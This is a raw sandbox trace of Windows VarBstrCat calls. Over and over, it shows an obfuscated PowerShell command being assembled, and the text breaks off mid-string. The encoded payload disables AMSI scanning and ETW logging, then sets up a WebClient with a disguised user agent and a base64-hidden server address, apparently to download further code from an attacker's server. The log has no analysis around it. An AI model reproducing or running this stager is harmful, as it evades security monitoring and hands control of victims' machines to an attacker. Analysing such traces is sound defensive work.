returned 0x0 [0175.827] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcA", bstrRight="OwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.827] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZA", bstrRight="BpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.827] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0", bstrRight="AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.827] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG", bstrRight="8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.827] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIA", bstrRight="MABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.828] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARA", bstrRight="BrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBN", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.828] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBN", bstrRight="AFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBAD", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.828] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBAD", bstrRight="QAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.830] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFA